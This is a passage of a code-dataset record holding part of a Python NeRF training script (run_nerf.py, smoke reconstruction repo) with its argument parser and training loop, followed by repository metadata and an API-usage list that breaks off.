[Numerical Error] {k} contains nan or inf.\")\n\n return ret\n\n\ndef config_parser():\n\n import configargparse\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True, \n help='config file path')\n parser.add_argument(\"--expname\", type=str, \n help='experiment name')\n parser.add_argument(\"--basedir\", type=str, default='./logs/', \n help='where to store ckpts and logs')\n parser.add_argument(\"--datadir\", type=str, default='./data/llff/fern', \n help='input data directory')\n\n # training options\n parser.add_argument(\"--net_model\", type=str, default='nerf',\n help='which model to use, nerf, siren, hybrid..')\n parser.add_argument(\"--netdepth\", type=int, default=8, \n help='layers in network')\n parser.add_argument(\"--netwidth\", type=int, default=256, \n help='channels per layer')\n parser.add_argument(\"--netdepth_fine\", type=int, default=8, \n help='layers in fine network')\n parser.add_argument(\"--netwidth_fine\", type=int, default=256, \n help='channels per layer in fine network')\n parser.add_argument(\"--N_rand\", type=int, default=32*32*4, \n help='batch size (number of random rays per gradient step)')\n parser.add_argument(\"--lrate\", type=float, default=5e-4, \n help='learning rate')\n parser.add_argument(\"--lrate_decay\", type=int, default=250, \n help='exponential learning rate decay (in 1000 steps)')\n parser.add_argument(\"--chunk\", type=int, default=1024*32, \n help='number of rays processed in parallel, decrease if running out of memory')\n parser.add_argument(\"--netchunk\", type=int, default=1024*64, \n help='number of pts sent through network in parallel, decrease if running out of memory')\n parser.add_argument(\"--no_batching\", action='store_true', \n help='only take random rays from 1 image at a time')\n parser.add_argument(\"--no_reload\", action='store_true', \n help='do not reload weights from saved ckpt')\n parser.add_argument(\"--ft_path\", type=str, default=None, \n help='specific weights npy file to reload for coarse network')\n parser.add_argument(\"--fix_seed\", type=int, default=42,\n help='the random seed.')\n parser.add_argument(\"--fading_layers\", type=int, default=-1,\n help='for siren and hybrid models, the step to finish fading model layers one by one during training.')\n parser.add_argument(\"--tempo_delay\", type=int, default=0,\n help='for hybrid models, the step to start learning the temporal dynamic component.')\n parser.add_argument(\"--vel_delay\", type=int, default=10000,\n help='for siren and hybrid models, the step to start learning the velocity.')\n parser.add_argument(\"--N_iter\", type=int, default=200000,\n help='for siren and hybrid models, the step to start learning the velocity.') \n parser.add_argument(\"--train_warp\", default=False, action='store_true',\n help='train radiance model with velocity warpping')\n\n # model options\n parser.add_argument(\"--bbox_min\", type=str,\n default='', help='use a boundingbox, the minXYZ')\n parser.add_argument(\"--bbox_max\", type=str,\n default='1.0,1.0,1.0', help='use a boundingbox, the maxXYZ')\n\n # loss hyper params, negative values means to disable the loss terms\n parser.add_argument(\"--vgg_strides\", type=int, default=4,\n help='vgg stride, should >= 2')\n parser.add_argument(\"--ghostW\", type=float,\n default=-0.0, help='weight for the ghost density regularization')\n parser.add_argument(\"--vggW\", type=float,\n default=-0.0, help='weight for the VGG loss')\n parser.add_argument(\"--overlayW\", type=float,\n default=-0.0, help='weight for the overlay regularization')\n parser.add_argument(\"--d2vW\", type=float,\n default=-0.0, help='weight for the d2v loss')\n parser.add_argument(\"--nseW\", type=float,\n default=0.001, help='velocity model, training weight for the physical equations')\n \n # task params\n parser.add_argument(\"--vol_output_only\", action='store_true', \n help='do not optimize, reload weights and output volumetric density and velocity')\n parser.add_argument(\"--vol_output_W\", type=int, default=256, \n help='In output mode: the output resolution along x; In training mode: the sampling resolution for training')\n parser.add_argument(\"--render_only\", action='store_true', \n help='do not optimize, reload weights and render out render_poses path')\n parser.add_argument(\"--render_test\", action='store_true', \n help='render the test set instead of render_poses path')\n\n # rendering options\n parser.add_argument(\"--N_samples\", type=int, default=64, \n help='number of coarse samples per ray')\n parser.add_argument(\"--N_importance\", type=int, default=0,\n help='number of additional fine samples per ray')\n parser.add_argument(\"--perturb\", type=float, default=1.,\n help='set to 0. for no jitter, 1. for jitter')\n parser.add_argument(\"--use_viewdirs\", action='store_true', \n help='use full 5D input instead of 3D')\n parser.add_argument(\"--i_embed\", type=int, default=0, \n help='set 0 for default positional encoding, -1 for none')\n parser.add_argument(\"--multires\", type=int, default=10, \n help='log2 of max freq for positional encoding (3D location)')\n parser.add_argument(\"--multires_views\", type=int, default=4, \n help='log2 of max freq for positional encoding (2D direction)')\n parser.add_argument(\"--raw_noise_std\", type=float, default=0., \n help='std dev of noise added to regularize sigma_a output, 1e0 recommended')\n parser.add_argument(\"--render_factor\", type=int, default=0, \n help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')\n\n # training options\n parser.add_argument(\"--precrop_iters\", type=int, default=0,\n help='number of steps to train on central crops')\n parser.add_argument(\"--precrop_frac\", type=float,\n default=.5, help='fraction of img taken for central crops') \n\n # dataset options\n parser.add_argument(\"--dataset_type\", type=str, default='llff', \n help='options: llff / blender / deepvoxels')\n parser.add_argument(\"--testskip\", type=int, default=8, \n help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')\n\n ## deepvoxels flags\n parser.add_argument(\"--shape\", type=str, default='greek', \n help='options : armchair / cube / greek / vase')\n\n ## blender flags\n parser.add_argument(\"--white_bkgd\", action='store_true', \n help='set to render synthetic data on a given bkgd (always use for dvoxels)')\n parser.add_argument(\"--half_res\", type=str, default='normal', \n help='load blender synthetic data at 400x400 instead of 800x800')\n\n ## llff flags\n parser.add_argument(\"--factor\", type=int, default=8, \n help='downsample factor for LLFF images')\n parser.add_argument(\"--no_ndc\", action='store_true', \n help='do not use normalized device coordinates (set for non-forward facing scenes)')\n parser.add_argument(\"--lindisp\", action='store_true', \n help='sampling linearly in disparity rather than depth')\n parser.add_argument(\"--spherify\", action='store_true', \n help='set for spherical 360 scenes')\n parser.add_argument(\"--llffhold\", type=int, default=8, \n help='will take every 1/N images as LLFF test set, paper uses 8')\n\n # logging/saving options\n parser.add_argument(\"--i_print\", type=int, default=400, \n help='frequency of console printout and metric loggin')\n parser.add_argument(\"--i_img\", type=int, default=2000, \n help='frequency of tensorboard image logging')\n parser.add_argument(\"--i_weights\", type=int, default=25000, \n help='frequency of weight ckpt saving')\n parser.add_argument(\"--i_testset\", type=int, default=50000, \n help='frequency of testset saving')\n parser.add_argument(\"--i_video\", type=int, default=50000, \n help='frequency of render_poses video saving')\n \n return parser\n\n\ndef train(parser, args):\n\n # Load data\n K = None\n if args.dataset_type == 'llff':\n images, poses, bds, render_poses, i_test = load_llff_data(args.datadir, args.factor,\n recenter=True, bd_factor=.75,\n spherify=args.spherify)\n hwf = poses[0,:3,-1]\n poses = poses[:,:3,:4]\n print('Loaded llff', images.shape, render_poses.shape, hwf, args.datadir)\n if not isinstance(i_test, list):\n i_test = [i_test]\n\n if args.llffhold > 0:\n print('Auto LLFF holdout,', args.llffhold)\n i_test = np.arange(images.shape[0])[::args.llffhold]\n\n i_val = i_test\n i_train = np.array([i for i in np.arange(int(images.shape[0])) if\n (i not in i_test and i not in i_val)])\n\n print('DEFINING BOUNDS')\n if args.no_ndc:\n near = np.ndarray.min(bds) * .9\n far = np.ndarray.max(bds) * 1.\n \n else:\n near = 0.\n far = 1.\n print('NEAR FAR', near, far)\n\n elif args.dataset_type == 'blender':\n images, poses, render_poses, hwf, i_split = load_blender_data(args.datadir, args.half_res in [\"True\", \"half\"], args.testskip)\n print('Loaded blender', images.shape, render_poses.shape, hwf, args.datadir)\n i_train, i_val, i_test = i_split\n\n near = 2.\n far = 6.\n\n if args.white_bkgd is not None:\n images = images[...,:3]*images[...,-1:] + (1.-images[...,-1:])*args.white_bkgd\n else:\n images = images[...,:3]\n\n elif args.dataset_type == 'LINEMOD':\n images, poses, render_poses, hwf, K, i_split, near, far = load_LINEMOD_data(args.datadir, args.half_res in [\"True\", \"half\"], args.testskip)\n print(f'Loaded LINEMOD, images shape: {images.shape}, hwf: {hwf}, K: {K}')\n print(f'[CHECK HERE] near: {near}, far: {far}.')\n i_train, i_val, i_test = i_split\n\n if args.white_bkgd is not None:\n images = images[...,:3]*images[...,-1:] + (1.-images[...,-1:])*args.white_bkgd\n else:\n images = images[...,:3]\n\n elif args.dataset_type == 'deepvoxels':\n\n images, poses, render_poses, hwf, i_split = load_dv_data(scene=args.shape,\n basedir=args.datadir,\n testskip=args.testskip)\n\n print('Loaded deepvoxels', images.shape, render_poses.shape, hwf, args.datadir)\n i_train, i_val, i_test = i_split\n\n hemi_R = np.mean(np.linalg.norm(poses[:,:3,-1], axis=-1))\n near = hemi_R-1.\n far = hemi_R+1.\n\n else:\n print('Unknown dataset type', args.dataset_type, 'exiting')\n return\n\n # Cast intrinsics to right types\n H, W, focal = hwf\n H, W = int(H), int(W)\n hwf = [H, W, focal]\n\n if K is None:\n K = np.array([\n [focal, 0, 0.5*W],\n [0, focal, 0.5*H],\n [0, 0, 1]\n ])\n\n if args.render_test:\n render_poses = np.array(poses[i_test])\n\n # Create log dir and copy the config file\n basedir = args.basedir\n expname = args.expname\n os.makedirs(os.path.join(basedir, expname), exist_ok=True)\n f = os.path.join(basedir, expname, 'args.txt')\n with open(f, 'w') as file:\n for arg in sorted(vars(args)):\n attr = getattr(args, arg)\n file.write('{} = {}\\n'.format(arg, attr))\n if args.config is not None:\n f = os.path.join(basedir, expname, 'config.txt')\n with open(f, 'w') as file:\n file.write(open(args.config, 'r').read())\n\n # Create nerf model\n render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, vel_optimizer = create_nerf(args)\n global_step = start\n\n bds_dict = {\n 'near' : near,\n 'far' : far,\n }\n render_kwargs_train.update(bds_dict)\n render_kwargs_test.update(bds_dict)\n\n # Move testing data to GPU\n render_poses = torch.Tensor(render_poses).to(device)\n\n # Short circuit if only rendering out from trained model\n if args.render_only:\n print('RENDER ONLY')\n with torch.no_grad():\n if args.render_test:\n # render_test switches to test poses\n images = images[i_test]\n else:\n # Default is smoother render_poses path\n images = None\n\n testsavedir = os.path.join(basedir, expname, 'renderonly_{}_{:06d}'.format('test' if args.render_test else 'path', start))\n os.makedirs(testsavedir, exist_ok=True)\n print('test poses shape', render_poses.shape)\n\n rgbs, _ = render_path(render_poses, hwf, K, args.chunk, render_kwargs_test, gt_imgs=images, savedir=testsavedir, render_factor=args.render_factor, bkgd_color=args.white_bkgd)\n print('Done rendering', testsavedir)\n imageio.mimwrite(os.path.join(testsavedir, 'video.mp4'), to8b(rgbs), fps=30, quality=8)\n\n return\n\n # Prepare raybatch tensor if batching random rays\n N_rand = args.N_rand\n use_batching = not args.no_batching\n if use_batching:\n # For random ray batching\n print('get rays')\n rays = np.stack([get_rays_np(H, W, K, p) for p in poses[:,:3,:4]], 0) # [N, ro+rd, H, W, 3]\n print('done, concats')\n rays_rgb = np.concatenate([rays, images[:,None]], 1) # [N, ro+rd+rgb, H, W, 3]\n rays_rgb = np.transpose(rays_rgb, [0,2,3,1,4]) # [N, H, W, ro+rd+rgb, 3]\n rays_rgb = np.stack([rays_rgb[i] for i in i_train], 0) # train images only\n rays_rgb = np.reshape(rays_rgb, [-1,3,3]) # [(N-1)*H*W, ro+rd+rgb, 3]\n rays_rgb = rays_rgb.astype(np.float32)\n print('shuffle rays')\n np.random.shuffle(rays_rgb)\n\n print('done')\n i_batch = 0\n\n # Move training data to GPU\n if use_batching:\n images = torch.Tensor(images).to(device)\n poses = torch.Tensor(poses).to(device)\n if use_batching:\n rays_rgb = torch.Tensor(rays_rgb).to(device)\n\n\n N_iters = args.N_iter + 1\n print('Begin')\n print('TRAIN views are', i_train)\n print('TEST views are', i_test)\n print('VAL views are', i_val)\n\n # Summary writers\n # writer = SummaryWriter(os.path.join(basedir, 'summaries', expname))\n \n start = start + 1\n for i in trange(start, N_iters):\n time0 = time.time()\n\n # Sample random ray batch\n if use_batching:\n # Random over all images\n batch = rays_rgb[i_batch:i_batch+N_rand] # [B, 2+1, 3*?]\n batch = torch.transpose(batch, 0, 1)\n batch_rays, target_s = batch[:2], batch[2]\n\n i_batch += N_rand\n if i_batch >= rays_rgb.shape[0]:\n print(\"Shuffle data after an epoch!\")\n rand_idx = torch.randperm(rays_rgb.shape[0])\n rays_rgb = rays_rgb[rand_idx]\n i_batch = 0\n\n else:\n # Random from one image\n img_i = np.random.choice(i_train)\n target = images[img_i]\n target = torch.Tensor(target).to(device)\n pose = poses[img_i, :3,:4]\n\n if N_rand is not None:\n rays_o, rays_d = get_rays(H, W, K, torch.Tensor(pose)) # (H, W, 3), (H, W, 3)\n\n if i < args.precrop_iters:\n dH = int(H//2 * args.precrop_frac)\n dW = int(W//2 * args.precrop_frac)\n coords = torch.stack(\n torch.meshgrid(\n torch.linspace(H//2 - dH, H//2 + dH - 1, 2*dH), \n torch.linspace(W//2 - dW, W//2 + dW - 1, 2*dW)\n ), -1)\n if i == start:\n print(f\"[Config] Center cropping of size {2*dH} x {2*dW} is enabled until iter {args.precrop_iters}\") \n else:\n coords = torch.stack(torch.meshgrid(torch.linspace(0, H-1, H), torch.linspace(0, W-1, W)), -1) # (H, W, 2)\n\n coords = torch.reshape(coords, [-1,2]) # (H * W, 2)\n select_inds = np.random.choice(coords.shape[0], size=[N_rand], replace=False) # (N_rand,)\n select_coords = coords[select_inds].long() # (N_rand, 2)\n rays_o = rays_o[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n rays_d = rays_d[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n batch_rays = torch.stack([rays_o, rays_d], 0)\n target_s = target[select_coords[:, 0], select_coords[:, 1]] # (N_rand, 3)\n\n ##### Core optimization loop #####\n rgb, disp, acc, extras = render(H, W, K, chunk=args.chunk, rays=batch_rays,\n verbose=i < 10, retraw=False,\n bkgd_color=args.white_bkgd,\n **render_kwargs_train)\n\n optimizer.zero_grad()\n img_loss = img2mse(rgb, target_s)\n # trans = extras['raw'][...,-1]\n loss = img_loss\n psnr = mse2psnr(img_loss)\n\n if 'rgb0' in extras:\n img_loss0 = img2mse(extras['rgb0'], target_s)\n loss = loss + img_loss0\n psnr0 = mse2psnr(img_loss0)\n\n loss.backward()\n optimizer.step()\n\n # NOTE: IMPORTANT!\n ### update learning rate ###\n decay_rate = 0.1\n decay_steps = args.lrate_decay * 1000\n new_lrate = args.lrate * (decay_rate ** (global_step / decay_steps))\n for param_group in optimizer.param_groups:\n param_group['lr'] = new_lrate\n ################################\n\n dt = time.time()-time0\n # print(f\"Step: {global_step}, Loss: {loss}, Time: {dt}\")\n ##### end #####\n\n # Rest is logging\n if i%args.i_weights==0:\n path = os.path.join(basedir, expname, '{:06d}.tar'.format(i))\n torch.save({\n 'global_step': global_step,\n 'network_fn_state_dict': render_kwargs_train['network_fn'].state_dict(),\n 'network_fine_state_dict': render_kwargs_train['network_fine'].state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n }, path)\n print('Saved checkpoints at', path)\n\n if i%args.i_video==0 and i > 0:\n # Turn on testing mode\n with torch.no_grad():\n rgbs, disps = render_path(render_poses, hwf, K, args.chunk, render_kwargs_test, bkgd_color=args.white_bkgd)\n print('Done, saving', rgbs.shape, disps.shape)\n moviebase = os.path.join(basedir, expname, '{}_spiral_{:06d}_'.format(expname, i))\n imageio.mimwrite(moviebase + 'rgb.mp4', to8b(rgbs), fps=30, quality=8)\n imageio.mimwrite(moviebase + 'disp.mp4', to8b(disps / np.max(disps)), fps=30, quality=8)\n\n # if args.use_viewdirs:\n # render_kwargs_test['c2w_staticcam'] = render_poses[0][:3,:4]\n # with torch.no_grad():\n # rgbs_still, _ = render_path(render_poses, hwf, args.chunk, render_kwargs_test)\n # render_kwargs_test['c2w_staticcam'] = None\n # imageio.mimwrite(moviebase + 'rgb_still.mp4', to8b(rgbs_still), fps=30, quality=8)\n\n if i%args.i_testset==0 and i > 0:\n testsavedir = os.path.join(basedir, expname, 'testset_{:06d}'.format(i))\n os.makedirs(testsavedir, exist_ok=True)\n print('test poses shape', poses[i_test].shape)\n with torch.no_grad():\n render_path(torch.Tensor(poses[i_test]).to(device), hwf, K, args.chunk, render_kwargs_test, gt_imgs=images[i_test], savedir=testsavedir, bkgd_color=args.white_bkgd)\n print('Saved test set')\n\n\n \n if i%args.i_print==0:\n print(f\"[TRAIN] Iter: {i} Loss: {loss.item()} PSNR: {psnr.item()}\")\n sys.stdout.flush()\n\n \"\"\"\n print(expname, i, psnr.numpy(), loss.numpy(), global_step.numpy())\n print('iter time {:.05f}'.format(dt))\n\n with tf.contrib.summary.record_summaries_every_n_global_steps(args.i_print):\n tf.contrib.summary.scalar('loss', loss)\n tf.contrib.summary.scalar('psnr', psnr)\n tf.contrib.summary.histogram('tran', trans)\n if args.N_importance > 0:\n tf.contrib.summary.scalar('psnr0', psnr0)\n\n\n if i%args.i_img==0:\n\n # Log a rendered validation view to Tensorboard\n img_i=np.random.choice(i_val)\n target = images[img_i]\n pose = poses[img_i, :3,:4]\n with torch.no_grad():\n rgb, disp, acc, extras = render(H, W, focal, chunk=args.chunk, c2w=pose,\n **render_kwargs_test)\n\n psnr = mse2psnr(img2mse(rgb, target))\n\n with tf.contrib.summary.record_summaries_every_n_global_steps(args.i_img):\n\n tf.contrib.summary.image('rgb', to8b(rgb)[tf.newaxis])\n tf.contrib.summary.image('disp', disp[tf.newaxis,...,tf.newaxis])\n tf.contrib.summary.image('acc', acc[tf.newaxis,...,tf.newaxis])\n\n tf.contrib.summary.scalar('psnr_holdout', psnr)\n tf.contrib.summary.image('rgb_holdout', target[tf.newaxis])\n\n\n if args.N_importance > 0:\n\n with tf.contrib.summary.record_summaries_every_n_global_steps(args.i_img):\n tf.contrib.summary.image('rgb0', to8b(extras['rgb0'])[tf.newaxis])\n tf.contrib.summary.image('disp0', extras['disp0'][tf.newaxis,...,tf.newaxis])\n tf.contrib.summary.image('z_std', extras['z_std'][tf.newaxis,...,tf.newaxis])\n \"\"\"\n\n global_step += 1\n\n\nif __name__=='__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\n parser = config_parser()\n args = parser.parse_args()\n set_rand_seed(args.fix_seed)\n\n bkg_flag = args.white_bkgd\n args.white_bkgd = np.ones([3], dtype=np.float32) if bkg_flag else None\n\n if args.dataset_type != 'pinf_data':\n train(parser, args)\n else:\n print(\"Try 'python run_pinf.py' with the config file instead.\")\n", "repo_name": "RachelCmy/pinf_smoke", "sub_path": "run_nerf.py", "file_name": "run_nerf.py", "file_ext": "py", "file_size_in_byte": 50436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stderr", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.stderr.isatty", "line_number": 11, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.cuda.manual_seed", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "call"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 177, "usage_type": "call"}, {"api_name": "time.time", "line_number": 178, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "imageio.imwrite", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "imageio.imwrite", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 272, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path", "line_number": 287, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 356, "usage_type": "attribute"}, {"api_name": "torch.nn.functional", "line_number": 356, "usage_type": "name"}, {"api_name": "torch.exp", "line_number": 356, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 361, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 373, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 374, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 385, "usage_type": "call"}, {"api_name": "torch.prod", "line_number": 387, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 389, "usage_type": "call"}, {"api_name": "torch.cumprod", "line_number": 391, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 407, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 411, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 497, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 511, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 518, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 519, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 526, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 527, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 535, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 543, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 548, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 552, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 603, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 604, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 635, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 650, "usage_type": "call"}, {"api_name": "torch.isinf", "line_number": 650, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 659, "usage_type": "call"}, {"api_name": "nerf_load.load_llff.load_llff_data", "line_number": 813, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 824, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.ndarray.min", "line_number": 832, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 832, "usage_type": "attribute"}, {"api_name": "numpy.ndarray.max", "line_number": 833, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 833, "usage_type": "attribute"}, {"api_name": "nerf_load.load_blender.load_blender_data", "line_number": 841, "usage_type": "call"}, {"api_name": "nerf_load.load_LINEMOD.load_LINEMOD_data", "line_number": 854, "usage_type": "call"}, {"api_name": "nerf_load.load_deepvoxels.load_dv_data", "line_number": 866, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 873, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 873, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 873, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 887, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 894, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 899, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 899, "usage_type": "call"}, {"api_name": "os.path", "line_number": 899, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 900, "usage_type": "call"}, {"api_name": "os.path", "line_number": 900, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 906, "usage_type": "call"}, {"api_name": "os.path", "line_number": 906, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 922, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 927, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 935, "usage_type": "call"}, {"api_name": "os.path", "line_number": 935, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 936, "usage_type": "call"}, {"api_name": "imageio.mimwrite", "line_number": 941, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 941, "usage_type": "call"}, {"api_name": "os.path", "line_number": 941, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 951, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 954, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 957, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 959, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 966, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 969, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", "line_number": 983, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 989, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1001, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 1003, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1007, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1012, "usage_type": "call"}, {"api_name": "torch.meshgrid", "line_number": 1013, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1014, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1015, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.meshgrid", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 1020, "usage_type": "call"}, {"api_name": "torch.reshape", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1023, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 1027, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 1066, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1076, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1079, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1079, "usage_type": "attribute"}, {"api_name": 